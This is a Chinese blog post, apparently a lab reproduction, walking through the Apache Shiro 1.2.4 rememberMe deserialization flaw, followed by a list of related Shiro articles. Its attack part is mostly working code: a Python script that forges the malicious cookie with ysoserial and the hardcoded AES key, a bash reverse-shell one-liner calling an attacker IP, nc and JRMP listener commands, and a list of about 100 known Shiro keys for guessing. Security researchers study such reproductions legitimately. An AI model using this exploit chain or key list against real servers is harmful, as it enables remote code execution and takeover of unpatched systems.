Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现

visionzheng 2020-05-04

0x00 影响版本

Apache Shiro <= 1.2.4

0x01 产生原因

shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:
得到rememberMe的cookie值-->Base64解码-->AES解密-->反序列化
然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。
payload 构造
前16字节的密钥-->后面加入序列化参数-->AES加密-->base64编码-->发送cookie

0x02 靶场环境

docker pull vulhub/shiro

Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现

然后打开127.0.0.1:8080
Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现

0x03 漏洞复现

POC:

import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES

def encode_rememberme(command):
    popen = subprocess.Popen([‘java‘, ‘-jar‘, ‘ysoserial-0.0.6-SNAPSHOT-all.jar‘, ‘JRMPClient‘, command], stdout=subprocess.PIPE)
    BS = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
    iv = uuid.uuid4().bytes
    encryptor = AES.new(key, AES.MODE_CBC, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext


if __name__ == ‘__main__‘:
    payload = encode_rememberme(sys.argv[1])    
print "rememberMe={0}".format(payload.decode())

攻击机上执行脚本生成恶意cookie

python shiro_shell.py 1.1.1.1:1099     #1.1.1.1为你的攻击机ip  端口可以随意变动,但是后面监听的时候也要做相应变动

生成的cookie类似下图
Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现

反弹shell制作
反弹shell需要加密,网址:http://www.jackson-t.ca/runtime-exec-payloads.html
反弹shell代码如下

bash -i >& /dev/tcp/1.1.1.1/7878 0>&1             #1.1.1.1为攻击机ip

攻击机监听端口
攻击机1.1.1.1上打开两个窗口,
其中一个窗口监听shell

nc -lvp 7878

另一个窗口监听JRMP端口

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections5 ‘加密后的反弹shell‘

将生成的恶意cookie通过httpie发送
在攻击机1.1.1.1上执行如下代码

http 1.1.1.2:8080/login ‘Cookie:rememberMe=UfsKYXK1SIOgFdnOxdPidh09yGZv6Medaj/T0E5sE9xhxMP69kzlNKsEdfHUhTgD12ea7NOv+xRhnZSGhUi9rz1tYVPu5QHfINrMS4I+lTe82RO5PY1vJrmMwP/NnBvjfGtTWTwRSNl1AhNgJrAhrEBStf+cpnBMwmoWxiexDjm2BavY/lSLe52hZhCEcr0zv/kqC9PdhBfY326+ux/RkE0pfwfZNMEUrPIZw8gBJkCIDTb1qj+W32+YinOKCkye/i+GmKHifPoMSt91q0nR/NQnxyu4UJQoULSbCI3/vXKtGm7P+YNqhH6smVPIoTxqtAqWTJG7eOafDPC2azUlhbLcmjql7qDL2wPpv4JOxB0fLIwdkQqSn9DCBty2BfKDqf8I/lvTbKqHHfVIUMdjYQ==‘

查看攻击机上监听的结果
发现两个端口都会收到消息

Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现
shell反弹到7878端口

Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现

常用的100个key

kPH+bIxk5D2deZiIxcaaaA==
4AvVhmFLUs0KTA3Kprsdag==
Z3VucwAAAAAAAAAAAAAAAA==
fCq+/xW488hMTCD+cmJ3aQ==
0AvVhmFLUs0KTA3Kprsdag==
1AvVhdsgUs0FSA3SDFAdag==
1QWLxg+NYmxraMoxAXu/Iw==
25BsmdYwjnfcWmnhAciDDg==
2AvVhdsgUs0FSA3SDFAdag==
3AvVhmFLUs0KTA3Kprsdag==
3JvYhmBLUs0ETA5Kprsdag==
r0e3c16IdVkouZgk1TKVMg==
5aaC5qKm5oqA5pyvAAAAAA==
5AvVhmFLUs0KTA3Kprsdag==
6AvVhmFLUs0KTA3Kprsdag==
6NfXkC7YVCV5DASIrEm1Rg==
6ZmI6I2j5Y+R5aSn5ZOlAA==
cmVtZW1iZXJNZQAAAAAAAA==
7AvVhmFLUs0KTA3Kprsdag==
8AvVhmFLUs0KTA3Kprsdag==
8BvVhmFLUs0KTA3Kprsdag==
9AvVhmFLUs0KTA3Kprsdag==
OUHYQzxQ/W9e/UjiAGu6rg==
a3dvbmcAAAAAAAAAAAAAAA==
aU1pcmFjbGVpTWlyYWNsZQ==
bWljcm9zAAAAAAAAAAAAAA==
bWluZS1hc3NldC1rZXk6QQ==
bXRvbnMAAAAAAAAAAAAAAA==
ZUdsaGJuSmxibVI2ZHc9PQ==
wGiHplamyXlVB11UXWol8g==
U3ByaW5nQmxhZGUAAAAAAA==
MTIzNDU2Nzg5MGFiY2RlZg==
L7RioUULEFhRyxM7a2R/Yg==
a2VlcE9uR29pbmdBbmRGaQ==
WcfHGU25gNnTxTlmJMeSpw==
OY//C4rhfwNxCQAQCrQQ1Q==
5J7bIJIV0LQSN3c9LPitBQ==
f/SY5TIve5WWzT4aQlABJA==
bya2HkYo57u6fWh5theAWw==
WuB+y2gcHRnY2Lg9+Aqmqg==
kPv59vyqzj00x11LXJZTjJ2UHW48jzHN
3qDVdLawoIr1xFd6ietnwg==
ZWvohmPdUsAWT3=KpPqda
YI1+nBV//m7ELrIyDHm6DQ==
6Zm+6I2j5Y+R5aS+5ZOlAA==
2A2V+RFLUs+eTA3Kpr+dag==
6ZmI6I2j3Y+R1aSn5BOlAA==
SkZpbmFsQmxhZGUAAAAAAA==
2cVtiE83c4lIrELJwKGJUw==
fsHspZw/92PrS3XrPW+vxw==
XTx6CKLo/SdSgub+OPHSrw==
sHdIjUN6tzhl8xZMG3ULCQ==
O4pdf+7e+mZe8NyxMTPJmQ==
HWrBltGvEZc14h9VpMvZWw==
rPNqM6uKFCyaL10AK51UkQ==
Y1JxNSPXVwMkyvES/kJGeQ==
lT2UvDUmQwewm6mMoiw4Ig==
MPdCMZ9urzEA50JDlDYYDg==
xVmmoltfpb8tTceuT5R7Bw==
c+3hFGPjbgzGdrC+MHgoRQ==
ClLk69oNcA3m+s0jIMIkpg==
Bf7MfkNR0axGGptozrebag==
1tC/xrDYs8ey+sa3emtiYw==
ZmFsYWRvLnh5ei5zaGlybw==
cGhyYWNrY3RmREUhfiMkZA==
IduElDUpDDXE677ZkhhKnQ==
yeAAo1E8BOeAYfBlm4NG9Q==
cGljYXMAAAAAAAAAAAAAAA==
2itfW92XazYRi5ltW0M2yA==
XgGkgqGqYrix9lI6vxcrRw==
ertVhmFLUs0KTA3Kprsdag==
5AvVhmFLUS0ATA4Kprsdag==
s0KTA3mFLUprK4AvVhsdag==
hBlzKg78ajaZuTE0VLzDDg==
9FvVhtFLUs0KnA3Kprsdyg==
d2ViUmVtZW1iZXJNZUtleQ==
yNeUgSzL/CfiWw1GALg6Ag==
NGk/3cQ6F5/UNPRh8LpMIg==
4BvVhmFLUs0KTA3Kprsdag==
MzVeSkYyWTI2OFVLZjRzZg==
CrownKey==a12d/dakdad
empodDEyMwAAAAAAAAAAAA==
A7UzJgh1+EWj5oBFi+mSgw==
YTM0NZomIzI2OTsmIzM0NTueYQ==
c2hpcm9fYmF0aXMzMgAAAA==
i45FVt72K2kLgvFrJtoZRw==
U3BAbW5nQmxhZGUAAAAAAA==
ZnJlc2h6Y24xMjM0NTY3OA==
Jt3C93kMR9D5e8QzwfsiMw==
MTIzNDU2NzgxMjM0NTY3OA==
vXP33AonIp9bFwGl7aT7rA==
V2hhdCBUaGUgSGVsbAAAAA==
Z3h6eWd4enklMjElMjElMjE=
Q01TX0JGTFlLRVlfMjAxOQ==
ZAvph3dsQs0FSL3SDFAdag==
Is9zJ3pzNh2cgTHB4ua3+Q==
NsZXjXVklWPZwOfkvk6kUA==
GAevYnznvgNCURavBhCr1w==
66v1O8keKNV3TTcGPK1wzg==
SDKOLKn2J1j/2BHjeZwAoQ==
visionzheng

visionzheng

相关推荐

shiro配合druid使用下URL拦截权限设置为anno时遇到的问题

在使用shiro做权限控制的一个系统中,其中有一个页面需要配置为无需登录就能访问,配置方法如下。这里配置的意思就是所有人都能直接访问 /test 这个路径,但是实际访问时,却报如下错误:

杜鲁门 / 0评论 2020-11-05

springboot windows10风格 工作流 整合项目框架源码 shiro 安全框架

此项目为Springboot工作流版本 windows 风格,浏览器访问操作使用,非桌面应用程序。

luckyxl0 / 0评论 2020-08-16

windows10风格 springboot mybatis 项目框架源码 shiro flowable工作流

此项目为Springboot工作流版本 windows 风格,浏览器访问操作使用,非桌面应用程序。

Dullonjiang / 0评论 2020-08-09

Apache Shiro 反序列化(CVE-2016-4437)复现

shiro默认使用CookieRememberMeManager,对rememberMe的cookie做了加密处理,在CookieRememberMeManaer类中将cookie中rememberMe字段内容先后进行序列化、AES加密、Base64编码操

xclxcl / 0评论 2020-08-03

Apache Shiro 反序列化(CVE-2016-4437)复现

shiro默认使用CookieRememberMeManager,对rememberMe的cookie做了加密处理,在CookieRememberMeManaer类中将cookie中rememberMe字段内容先后进行序列化、AES加密、Base64编码操

zmzmmf / 0评论 2020-08-03

不用 Spring Security 可否?试试这个小而美的安全框架

写在前面在一款应用的整个生命周期,我们都会谈及该应用的数据安全问题。用户的合法性与数据的可见性是数据安全中非常重要的一部分。但是,一方面,不同的应用对于数据的合法性和可见性要求的维度与粒度都有所区别;另一方面,以当前微服务、多服务的架构方式,如何共享Ses

MicroBoy / 0评论 2020-08-02

springboot windows10风格 工作流 整合项目框架源码 shiro

此项目为Springboot工作流版本 windows 风格,浏览器访问操作使用,非桌面应用程序。

ganjing / 0评论 2020-08-02

【Shiro】05 自定义Realm认证实现

Shiro默认使用自带的IniRealm,IniRealm从ini配置文件中读取用户的信息,大部分情况下需要从系统的数据库中读取用户信息,所以需要自定义realm。public abstract class CachingRealm implements

likesyour / 0评论 2020-08-01

springboot windows10风格 工作流 整合项目框架源码 shiro 安全框架

此项目为Springboot工作流版本 windows 风格,浏览器访问操作使用,非桌面应用程序。

zmzmmf / 0评论 2020-07-09

Spring Security 从入门到实战

Spring Security 和 Apache Shiro 都是安全框架,为Java应用程序提供身份认证和授权。本片文章将讲述Security入门到项目实战使用。其中包括简单的登录和项目常用的权限管理,权限校验有两种方式、角色资源校验、URL校验,如果有

MicroBoy / 0评论 2020-07-05

springcloud vue.js 微服务 分布式 flowable 工作流 前后分离 shiro权限

三:系统服务 -----------------------------------------------------------------------------------------------------1. 权限管理:点开二级菜单进入三级菜单

zzhao / 0评论 2020-06-26

springcloud vue.js 微服务分布式 activiti工作流 前后分离 集成代码生成器 shiro权限

三:系统服务 -----------------------------------------------------------------------------------------------------1. 权限管理:点开二级菜单进入三级菜单

子云 / 0评论 2020-06-18

shiro java 反序列漏洞复现

返回值中能在set-cookie很明显看到rememberme=deleteme 这个的字段,那么很有可能存在shiro漏洞。运行shiro.py根据域名生成payload,后面的网址就是上一步生成的域名,前面自己加上http://头。复制payload,

visionzheng / 0评论 2020-06-07

Spring Security

Spring家族的安全管理框架,竞品是Shiro。虽然Security功能比Shiro强大,但Spring Boot出现之前,Security的整合比较麻烦,使得大部分项目选择使用Shiro。Spring Boot对于Spring Security提供了自

neweastsun / 0评论 2020-06-04

SpringBoot11:集成Shiro

Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。Cryptography:加密,使用密码学

ErixHao / 0评论 2020-06-03

Shiro+JWT 实现权限管理(一)--Shiro

再后来的工作过程中,发现了shiro的一些不足之处--对于多端登录支持不是很友好,需要自己去实现具体功能.在大致研究了JWT功能后,决定对之前写的权限管理做一些优化--使用JWT做认证,配合Shrio强大的授权功能,实现更加全面、轻量化的权限管理.之前那篇

GDreams0 / 0评论 2020-06-01

springboot整合shiro

Shiro是Apache下的一个开源项目。shiro属于轻量级框架,相对于SpringSecurity简单的多,也没有SpringSecurity那么复杂。

ganjing / 0评论 2020-05-29

Java项目源码 考试系统 springboot mybaits vue.js 前后分离跨域 shiro 权限

34. 成绩管理:可以根据条件检索考生成绩,分值排序逆序,查看排名,查看考生试卷信息,查看试题统计图。列表动态滑动放大展示。

zmzmmf / 0评论 2020-05-28

shiro配置登录验证(前后端分离项目)

本次只是记录一下启用shiro配置过程遗忘掉的几个关键点,首先项目是前后端分离的后台,提供json格式的接口数据,但又是一个web项目,现在要控制登录之后才能使用1、ShiroFilterFactoryBean我这里是一个自定义的,继承ShiroFilte

nullcy / 0评论 2020-05-26

30分钟学会如何使用Shiro

要学习如何使用Shiro必须先从它的架构谈起,作为一款安全框架Shiro的设计相当精妙。Shiro的应用不依赖任何容器,它也可以在JavaSE下使用。但是最常用的环境还是JavaEE。下面以用户登录为例:。token可以理解为用户令牌,登录的过程被抽象为S

ganjing / 0评论 2020-05-22

springcloud vue.js 微服务分布式 activiti工作流 前后分离 集成代码生成器 shiro权限

三:系统服务 -----------------------------------------------------------------------------------------------------1. 权限管理:点开二级菜单进入三级菜单

shixiaoguo0 / 0评论 2020-05-06

3. shiro- 权限认证

--templates下的只能通过controller访问-->

ganjing / 0评论 2020-05-06

shiro整合thymeleaf

--从seesion中判断是否有用户-->

luckyxl0 / 0评论 2020-05-05

Shiro反序列化漏洞检测、dnslog

pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode(). encryptor = AES.new(base64.b64decode(key), mode, iv).

visionzheng / 0评论 2020-05-05

SpringBoot整合Shiro 四:认证+授权

return "未授权无法访问";

nullcy / 0评论 2020-04-30

CAS 5.3.1系列之自定义Shiro认证策略(四)

CAS官方文档是介绍基于配置实现shiro认证的,可以参考官方文档,不过我们也可以通过自定义认证策略的方式实现jdbc认证,pom先加入相关jar. * 修改后版本: 修改人: 修改日期: 2020/04/26 11:33 修改内容:

zhangxiaocc / 0评论 2020-04-29

Shiro源码分析-ShiroFilterFactoryBean

* Inspects a bean, and if it implements the {@link Filter} interface, automatically adds that filter. * instance to the internal

visionzheng / 0评论 2020-04-29

Springboot整合Shiro

开始配置ShiroConfig,从底层开始配置,Realm需要额外写一个类UserRealm,这个类便是shiro的核心。UserRealm只需继承AuthorizingRealm类即可,要实现如下两个方法,本类为shiro核心:

nullcy / 0评论 2020-04-25

springboot windows10风格 activiti 整合项目框架源码 shiro 安全框架 druid

此项目为Springboot工作流版本 windows 风格,浏览器访问操作使用,非桌面应用程序。

heywakeup / 0评论 2020-04-23

SpringBoot整合Shiro 一:搭建环境

<artifactId>spring-boot-starter-thymeleaf</artifactId>. package com.zy.config;return null;return null;return new Use

zmzmmf / 0评论 2020-04-23

springcloud activiti工作流 微服务分布式 vue.js 前后分离 集成代码生成器 shiro权限

三:系统服务 -----------------------------------------------------------------------------------------------------1. 权限管理:点开二级菜单进入三级菜单

YZR / 0评论 2020-04-21

Springboot与Shiro的整合

Springboot使用的页面模板是thyme leaf,它比jsp多一些特定的标签,可以动态或者静态显示文本内容。~ * Copyright 2019. tdc.shangri-la.com. All Rights Reserved.* subjec

visionzheng / 0评论 2020-04-20

Maven导入shiro的依赖后,欢迎页面404、shiro-features异常的解决方案:

自己练习shiro的时候,导入shiro官网的全部依赖,发现有两个依赖在项目里会造成某些异常。以下时shiro官方提供的全部依赖,但是有两个最好注释掉:。-- shiro相关的所有依赖等同于shiro-all -->

visionzheng / 0评论 2020-04-19

Spring Boot 整合 Shiro 实现登录认证与权限控制

`perm_id` int NOT NULL COMMENT ‘权限主键‘,`perm_description` varchar CHARACTER SET utf8 COLLATE utf8_bin DEFAULT NULL COMMENT ‘权限描述‘

luckyxl0 / 0评论 2020-04-19

springboot shiro session过期时间配置

#实际过期时间为秒数对分钟取整,比如设置2000,则 2000s/60=33min,33min*60=1980s,实际过期时间为1980s. 配置shiro-Session的优先级高于使用servlet的session。

visionzheng / 0评论 2020-04-14

springcloud vue.js 微服务分布式 activiti工作流 前后分离 集成代码生成器 shiro权限

三:系统服务 -----------------------------------------------------------------------------------------------------1. 权限管理:点开二级菜单进入三级菜单

huoyunp / 0评论 2020-04-11

SpringBoot学习记录:@Cacheable不起作用 --&gt;原因:Shiro + @Cache整合

SpringBoot学习记录:@Cacheable不起作用 -->原因:Shrio + @Cache整合。@Cacheable ,当使用ehcache时,autoconfig机制会根据配置文件自动去初始化bean. 而shiroConfig在@Con

luckyxl0 / 0评论 2020-03-23

Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)复现

然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。安装docker环境,方法自行百度。生成的工具在target/目录下ysoserial-0.0.6-SNAPSHOT-all.jar文件。浏览器访问,出现以下页面则证明环境

chenjia00 / 0评论 2020-03-23

springcloud vue.js 微服务分布式 activiti工作流 前后分离 集成代码生成器 shiro权限

三:系统服务 -----------------------------------------------------------------------------------------------------1. 权限管理:点开二级菜单进入三级菜单

nullcy / 0评论 2020-03-21

springcloud vue.js 微服务分布式 activiti工作流 前后分离 集成代码生成器 shiro权限

三:系统服务-----------------------------------------------------------------------------------------------------1. 权限管理:点开二级菜单进入三级菜单显

yxlnum / 0评论 2020-03-16

Springboot vue.js html 跨域 前后分离 工作流Activiti6 集成代码生成器 shiro 权限

后台框架:springboot2.1.2+ activiti6.0.0+ mybaits+maven+接口

xtiawxf / 0评论 2020-03-14

Springboot vue.js 前后分离 跨域 集成代码生成器 shiro权限

1. 权限管理:点开二级菜单进入三级菜单显示 角色和按钮权限 角色: 分角色组和角色,独立分配菜单权限和增删改查权限。

gsc / 0评论 2020-02-27

springboot @Configuration @bean注解作用

在spring项目中我们集成第三方的框架如shiro会在spring.xml配置文件中进行配置,例如:。-- 注入shiro核心组件安全管理器 -->. -- 注入相关页面 -->. -- 配置过滤器链:配置项目发出url对应拦截规则:指定什么

牧场SZShepherd / 0评论 2020-02-16

shiro

https://www.cnblogs.com/WUXIAOCHANG/p/10886534.html https://blog.csdn.net/pengjwhx/article/details/84867112

nullcy / 0评论 2020-02-16

spring项目篇5----shiro以及实现登陆认证

Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。但是,在Shiro中,Subject这一概

ganjing / 0评论 2020-02-16

Shiro&amp;Jwt验证

其实这个方法我们会手动调用 isLoginAttempt 方法及 executeLogin 方法isLoginAttempt判断用户是否想要登陆,判断依据为请求头中是否包含 Authorization 授权信息,也就是所谓的 Token. 如果有则再执行e

luckyxl0 / 0评论 2020-02-12

Springboot集成Shiro和Cas实现单点登录(服务端篇CAS5)

什么是单点登录?单点登录,简称为 SSO,是目前比较流行的企业业务整合的解决方案之一。SSO的定义是在多个应用系统中,用户只需要登录一次就可以访问所有相互信任的应用系统。

zmzmmf / 0评论 2020-02-09

shiro自定义密码校验器

它们都实现了一个接口 CredentialsMatcher ,我这里也实现这个接口,实现一个自己的密码校验。配置自己的密码校验类替换默认的:由于是springboot,我们直接在配置类ShiroConfig里面配置:。此时我们的密码校验类就替换成了我们自己

visionzheng / 0评论 2020-01-29

使用Shiro实现认证和授权(基于SpringBoot)

Apache Shiro是一个功能强大且易于使用的Java安全框架,它为开发人员提供了一种直观,全面的身份验证,授权,加密和会话管理解决方案。下面是在SpringBoot中使用Shiro进行认证和授权的例子,代码如下:

stoneechogx / 0评论 2020-01-29